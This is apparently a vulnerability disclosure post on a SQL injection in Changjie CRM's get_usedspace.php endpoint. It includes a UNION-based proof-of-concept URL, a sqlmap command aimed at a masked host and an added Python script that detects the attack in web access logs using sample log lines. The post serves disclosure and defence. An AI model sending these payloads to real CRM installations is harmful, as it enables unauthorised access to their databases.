Changjie CRM get_usedspace.php SQL injection vulnerability
Vulnerability Description
The get_usedspace.php endpoint of Changjie CRM has a SQL injection vulnerability through which sensitive database information can be obtained.
Vulnerability Impact
Changjie CRM
Network surveying and mapping
Vulnerability Reproduction
Login page
Verification PoC
/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--
Verifying the vulnerability with sqlmap
sqlmap -u "https://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id
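A defensive check built from the endpoint and parameter above (an added example, not part of the original post or the vendor's code): it scans web access logs for requests to get_usedspace.php whose site_id is not a plain integer. The log lines are constructed samples in Combined Log Format, and the integer-only rule for site_id is an assumption based on the site_id=1 value in the sqlmap command.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the advisory.
ENDPOINT = "/webservice/get_usedspace.php"
PARAM = "site_id"

# Assumption: a legitimate site_id is a plain non-negative integer.
VALID_ID = re.compile(r"\d{1,10}")

# Client IP, request target and status from a Combined Log Format line.
# The target is matched greedily up to the protocol token because an
# unencoded payload can contain spaces.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+" (\d{3})')

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /webservice/get_usedspace.php?site_id=1 HTTP/1.1" 200 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT '
    'CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)-- HTTP/1.1" 200 298',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20'
    'CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)-- HTTP/1.1" 200 298',
    '198.51.100.10 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /index.php?site_id=abc HTTP/1.1" 200 1024',
]

def suspicious_requests(log_lines):
    """Return (client_ip, status, decoded_value) for every request to
    ENDPOINT whose site_id is not a plain integer."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if parts.path.lower() != ENDPOINT:
            continue
        # parse_qs URL-decodes values, so encoded and raw payloads compare equal.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            if not VALID_ID.fullmatch(value):
                hits.append((client, int(status), value))
    return hits

if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} site_id={value!r}")
```

The same integer-only rule can be enforced in front of the application (WAF or reverse proxy) until the endpoint itself is fixed; this sketch only covers the query string, not POST bodies.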
This post is licensed under CC BY 4.0 by the author.